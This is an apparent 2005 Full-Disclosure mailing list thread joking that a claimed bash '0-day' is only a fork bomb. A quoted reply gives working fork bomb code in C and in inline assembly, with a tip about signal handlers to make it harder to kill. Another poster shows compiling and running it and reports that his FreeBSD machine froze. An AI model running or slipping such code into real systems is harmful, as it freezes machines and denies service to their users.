Date: Tue Aug 16 10:45:14 2005
From: jaymzu at gmail.com (Jay)
Subject: bash vulnerability?

?(jay@xxx:p4)(~)
?(Power:on-line:100% cat > a.c                                
int main(){
        __asm__(
                "xorl %ecx,%ecx\n"
                "cdq\n"
                "HERE:\n"
                "movl $0x2,%eax\n"
                "int $0x80\n"
                "jmp HERE\n"
        );
}
^C
?(jay@xxx:p4)(~)
?(130:Power:on-line:100% make a                              
cc -O -pipe -march=pentium4  a.c  -o a
?(jay@xxx:p4)(~)
?(Power:on-line:100% ./a                               
^C
?(jay@xxx:p4)(~)
?(130:Power:on-line:100% uname -srm
FreeBSD 6.0-BETA1 i386


the machine froze instantly but eventually, after a minute or so I was
able to ^C

--
Jay

On Tue, 2005-08-16 at 11:10 +0200, Rik Bobbaers wrote:
> On Monday 15 August 2005 09:59, Jay wrote:
> > It's not nice to brag about finding 0-day bullshit in the bash fork
> > bomb that has been Zalewski's signature for years :P
> 
> i think i know where he got it from.. i was on an irc channel a couple of days 
> ago, and someone posted it (as a joke of course). it's ... ahm... funny that 
> it comes back over here just a few days later!
> 
> i don't know how this is a 0day and gives you remote access (it does the 
> opposite...)
> 
> but if you want one that's a bit harder to stop:
> 
> c version:
> int main () {
>         while (1) fork();
> }
> 
> an asm (quick hack):
> int main(){
>         __asm__(
>                 "xorl %ecx,%ecx\n"
>                 "cdq\n"
>                 "HERE:\n"
>                 "movl $0x2,%eax\n"
>                 "int $0x80\n"
>                 "jmp HERE\n"
>         );
> }
> 
> sry it's in c... the machine i made it on didn't have gas or nasm.
> 
> anyway, if you compile this and run it in background, it will all die pretty 
> fast. (to make it even harder, make your own signal handlers!(okay, SIGKILL 
> will still work, but it will be harder to kill :))
> 
> shall we call this C and assembler 0days? ;)
> 
> -- 
> harry
> aka Rik Bobbaers
> 
> K.U.Leuven - LUDIT          -=- Tel: +32 485 52 71 50
> Rik.Bobbaers@...kuleuven.be -=- http://harry.ulyssis.org
> 
> Disclaimer:
> By sending an email to ANY of my addresses you are agreeing that:
>   1. I am by definition, "the intended recipient"
>   2. All information in the email is mine to do with as I see fit and make 
> such financial profit, political mileage, or good joke as it lends itself to. 
> In particular, I may quote it on usenet.
>   3. I may take the contents as representing the views of your company.
>   4. This overrides any disclaimer or statement of confidentiality that may be 
> included on your message. 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 


